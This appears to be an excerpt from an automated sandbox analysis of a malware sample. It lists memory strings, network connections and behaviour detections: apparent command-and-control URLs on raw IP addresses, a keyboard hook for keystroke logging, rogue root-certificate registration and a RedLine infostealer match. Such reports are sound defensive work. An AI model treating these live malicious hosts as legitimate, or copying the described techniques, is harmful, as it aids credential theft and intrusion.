                    Source: alg.exe, 00000022.00000003.2242323432.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2430544276.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2122882435.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2274219091.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2141791316.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2106221522.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2195841831.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547916936.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2004099122.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ceginiuaduqvis
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/csle
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hwverablwtpyp
                    Source: Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ui
                    Source: alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/ceginiuaduqvi
                    Source: Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/csle
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/pjqqch
                    Source: alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/yqjfubvmytgoP
                    Source: alg.exe, 00000022.00000003.2575632812.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/sywxrbcrkxovprj
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1682798891.00000000029B3000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1781580936.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.00000000029BD000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1663538271.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020C49000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1663538271.000000002218B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1761274523.00000000224F5000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000001F.00000000.1665063094.0000000000416000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.pmail.com
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                    Source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                    Source: AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                    Source: AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy
                    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                    Source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                    Source: alg.exe, 00000022.00000003.2474411546.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2478496148.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2477848647.0000000000530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://scss.adobesc.com
                    Source: alg.exe, 00000022.00000003.2478496148.0000000000530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49892 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49996 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:50000 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                    E-Banking Fraud

                    barindex
                    Registers a new ROOT certificate
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,9_2_00007FF7F139B684
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E342C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F14193A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,9_2_00007FF7F13D184C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF7F14198B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,9_2_00007FF7F136F9B8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,9_2_00007FF7F137FC20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF7F13DE1F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,9_2_00007FF7F13A25E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F141A740
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,9_2_00007FF7F13CEA7C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF7F13A29A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0EF4 NCryptImportKey,#205,#359,#359,#357,9_2_00007FF7F13E0EF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416EA8 NCryptImportKey,#360,9_2_00007FF7F1416EA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,9_2_00007FF7F13D0F58

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 47.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 47.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    .NET source code contains very large strings
                    Source: Trading_AIBot.exe.31.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                    Drops large PE files
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.33.dr 665670656Jump to dropped file
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152898C NtQueryInformationToken,4_2_00007FF7D152898C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1513D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF7D1513D94
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1541538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF7D1541538
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15289E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF7D15289E4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1528114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF7D1528114
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF7D153BCF0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15288C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF7D15288C0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1527FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF7D1527FF8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D152898C NtQueryInformationToken,8_2_00007FF7D152898C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1513D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,8_2_00007FF7D1513D94
